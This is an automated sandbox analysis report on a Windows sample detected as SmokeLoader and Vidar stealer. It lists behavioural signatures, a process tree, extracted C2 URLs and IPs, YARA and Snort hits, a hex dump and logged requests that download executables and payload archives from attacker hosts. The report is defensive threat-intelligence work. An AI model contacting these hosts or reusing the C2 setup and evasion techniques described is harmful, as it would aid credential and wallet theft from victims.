Edit tour

Windows Analysis Report
hOdgEiePTe.exe

Overview

General Information

Sample Name:	hOdgEiePTe.exe
Analysis ID:	654709
MD5:	f3af35c6e121ff8fe96b0794e6f72d6b
SHA1:	d9143edee2471a8205edadb5bf532bff3d9a88aa
SHA256:	cef4f5f561b5c481c67e0a9a3dd751d18d696b61c7a5dab5ebb29535093741b4
Tags:	exeTeamBot
Infos:

Detection

SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Found inlined nop instructions (likely shell or obfuscated code)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Registers a DLL

Classification

Process Tree

System is w10x64

hOdgEiePTe.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\hOdgEiePTe.exe" MD5: F3AF35C6E121FF8FE96B0794E6F72D6B)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

900B.exe (PID: 3076 cmdline: C:\Users\user\AppData\Local\Temp\900B.exe MD5: E1806DF573470FC02E4271A8AA1E9D95)

regsvr32.exe (PID: 412 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\5D03.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5984 cmdline: /s C:\Users\user\AppData\Local\Temp\5D03.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

7791.exe (PID: 1824 cmdline: C:\Users\user\AppData\Local\Temp\7791.exe MD5: 5AD1BEF6F9DF3C527F7217DCCD26C2D5)

hcthhbi (PID: 6328 cmdline: C:\Users\user\AppData\Roaming\hcthhbi MD5: F3AF35C6E121FF8FE96B0794E6F72D6B)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://piratia.su/tmp/", "http://piratia-life.ru/tmp/", "http://diewebseite.at/tmp/", "http://faktync.com/tmp/", "http://mupsin.ru/tmp/", "http://aingular.com/tmp/", "http://mordo.ru/tmp/"]}

Threatname: Vidar

{"C2 url": ["https://t.me/ch_inagroup", "https://mastodon.social/@olegf9844e"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000002.00000000.317713525.0000000002851000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000D.00000002.382652287.00000000004C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000002.486664675.0000000000D41000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001D.00000002.535729993.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.382836184.0000000002131000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001D.00000002.535099899.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.335353490.0000000000610000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.335418387.0000000000631000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Process Memory Space: 7791.exe PID: 1824	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7791.exe PID: 1824	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
29.3.7791.exe.27e0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
29.2.7791.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
29.3.7791.exe.27e0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
29.2.7791.exe.2790e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
29.2.7791.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
29.2.7791.exe.2790e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Snort Signatures

ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved - Source IP: 159.69.101.170 - Destination IP: 192.168.2.3

Timestamp:	159.69.101.170192.168.2.380497922035911 06/29/22-23:12:20.334596
SID:	2035911
Source Port:	80
Destination Port:	49792
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 29 Jun 2022 21:12:20 GMTContent-Type: application/zipContent-Length: 1565849Last-Modified: Wed, 13 Apr 2022 15:59:31 GMTConnection: keep-aliveETag: "6256f363-17e499"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b e9 b5 00 00 48 47 01 00 10 00 00 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c ec fd 0b 40 54 d5 d7 30 0e 9f 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 10 02 c1 39 a8 29 8a 0e 94 e3 69 ca 5f 59 59 59 69 5a 3f 2b 2b bb 99 99 19 88 09 98 29 5e 2a 4b 2b 34 ab 83 43 8a 46 80 4a ce b7 d6 3e 67 60 50 e9 79 9e f7 ff 3e ff f7 7b bf ef 41 f7 39 fb ba f6 da 6b af b5 f6 da fb ec bd 27 61 e1 16 4a 4c 51 94 04 9c cd 46 51 07 28 fe 2f 8a fa 8f ff 5a c0 79 8c 38 e8 41 7d d4 e7 eb 91 07 44 b3 be 1e 39 cf 98 5b a2 2c 2a 2e 5c 5e 9c b1 42 99 99 51 50 50 48 2b 97 65 2b 8b 99 02 65 6e 81 32 76 4e 92 72 45 61 56 f6 64 77 77 37 5f 01 86 e8 d6 ae d9 fa 6d 5f 0f b3 bb 1b 92 51 c3 a6 c1 7b 56 e3 92 61 b3 49 dc 89 61 f9 f0 de 7e bb de 27 99 bc 4f fa a4 90 77 9d 4f 34 79 7f e9 93 4e de 5f fb c4 92 b7 7a 18 ff 3e 45 c2 73 73 33 8d 08 d7 8e b3 41 4f 51 b3 44 ce 94 2c 64 dc 02 7b 5c 23 35 6a 64 5f 91 47 5f ea 2a 04 94 42 e4 bb e0 14 04 43 8a f8 d0 ef 44 51 2e f0 72 a3 f8 37 f9 8b 12 11 e2 1d ea e7 04 74 8c 8a 26 85 14 14 d5 fd e6 5f fb 80 58 9e 7d 28 aa 4a 21 a2 9e c0 48 a5 88 92 4a 1c 88 29 15 51 f1 91 f0 56 89 a8 ad 50 c1 be 11 14 15 42 f5 fe c7 8d b8 a7 8f 00 ee a1 7f c8 3f 99 ce 5e 45 c3 fb 68 93 80 d0 55 a1 d3 1d fe a0 e9 4b 27 67 65 d0 19 e0 8f 25 0d 14 91 36 53 d7 1c 73 91 7a ab 26 e7 f2 19 0f 38 f3 75 13 82 b4 dc 97 2f 6a 72 71 49 71 26 36 4f 82 15 08 f9 da 1e 94 2f 3b bf 30 93 22 6d 47 1a 50 32 78 77 de 97 2f 86 fa 9f bf ff ad 7f 45 63 e1 d1 00 0f 51 0b fa b6 8c 43 3a 8f c7 b8 87 30 d9 0f 45 06 1f 5b f0 b1 03 1f fb f0 51 85 8f 06 7c 28 27 62 87 e1 23 0a 1f 8d f8 50 4c c2 54 7c 50 93 31 88 8f a5 f8 68 51 63 89 00 8a e2 99 5b 15 8a f0 c2 30 a8 43 1f 3e a8 70 2c 11 81 25 f0 51 85 8f 46 7c 50 28 1d e5 f8 58 8a 8c 5f 14 8b 09 f8 a0 f4 58 39 3e 8a 88 2f 0e 71 c6 c7 52 7c 6c c1 07 35 0d eb c5 47 14 3e 96 e2 43 35 1d e1 cd 44 4c f1 d1 82 0f 6a 16 e6 c3 47 14 3e ca 49 30 01 d1 c0 47 d1 9b 18 87 8f 2d f8 d8 87 8f 2a e2 7b 0b f3 bd 8d 40 f1 11 85 8f a5 f8 28 22 c1 bd 58 02 1f 0d 7b ed 9a 65 3c 3c 44 1d f8 90 ec 83 87 6a 1f 82 c2 87 f4 7d 2c fb 01 12 1b 1f ca 0f 11 28 3e 12 f1 f1 1c 3e a8 8f a1 44 d1 7e 24 d3 67 48 83 06 04 7f 1a 83 df a1 ef 22 36 e6 47 2c fb 33 82 6a 44 0c 7e 45 5c f0 b1 f4 37 28 bb 03 1f 0d bf 61 02 87 a0 50 15 18 ac 58 a5 b5 07 6f d8 b5 5f b9 92 52 40 26 85 ca 49 a4 28 07 47 f1 9d ad d8 e3 49 29 ae 80 53 7a 51 0a c5 50 4a e1 0b 2e 0a dc 3c 70 34 b8 bd 10 7f 00 5c 15 b8 13 e0 ce 83 bb 02 ae 05 1c 35 90 52 c8 c0 79 82 f3 01 37 1e 5c 00 b8 88 81 bc d6 8c 82 77 3c 38 03 b8 79 e0 e6 83 5b 0c 6e 29 b8 2c 70 46 70 f9 e0 56 81 5b 0b ae 1c 5c 05 b8 4d e0 9e 00 b7 05 dc 56 70 db c0 6d 07 b7 03 dc 6e 70 7b c0 ed 05 b7 0f

Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.101.170

Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.69.101.170/1415
Source: 7791.exe, 0000001D.00000002.535051710.000000000019A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://159.69.101.170/4798399205.zip
Source: 7791.exe, 0000001D.00000002.535051710.000000000019A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://159.69.101.170/4798399205.zip/1415
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.520547218.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.29.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://www.mozilla.com0
Source: 7791.exe, 0000001D.00000003.520523514.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 5D03.dll.2.dr	String found in binary or memory: https://github.com/dotnet/corefx/tree/c6cf790234e063b855fcdb50f3fb1b3cfac732758
Source: 7791.exe, 7791.exe, 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, 7791.exe, 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mastodon.social/
Source: 7791.exe, 7791.exe, 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.520523514.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 7791.exe, 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.520547218.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ch_inagroup
Source: 7791.exe, 0000001D.00000003.520547218.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ch_inagroup_
Source: 7791.exe, 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, 7791.exe, 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ch_inagrouphttps://mastodon.social/
Source: 7791.exe, 0000001D.00000003.520523514.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.523817812.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.522263246.00000000278D9000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.29.dr, softokn3.dll.29.dr, freebl3.dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cykwgckuqp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: linislominyt11.at

Source: unknown

DNS traffic detected: queries for: monsutiur4.com

Source: global traffic	HTTP traffic detected: GET /upload/chrome.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: amarillavida.com
Source: global traffic	HTTP traffic detected: GET /ch_inagroup HTTP/1.1Host: t.me
Source: global traffic	HTTP traffic detected: GET /1415 HTTP/1.1Host: 159.69.101.170
Source: global traffic	HTTP traffic detected: GET /4798399205.zip HTTP/1.1Host: 159.69.101.170Cache-Control: no-cache

Source: unknown	HTTPS traffic detected: 206.221.182.74:443 -> 192.168.2.3:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49789 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.317713525.0000000002851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382652287.00000000004C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.486664675.0000000000D41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382836184.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335353490.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335418387.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: hOdgEiePTe.exe, 00000000.00000002.335514513.000000000077A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: hOdgEiePTe.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004159F0	0_2_004159F0
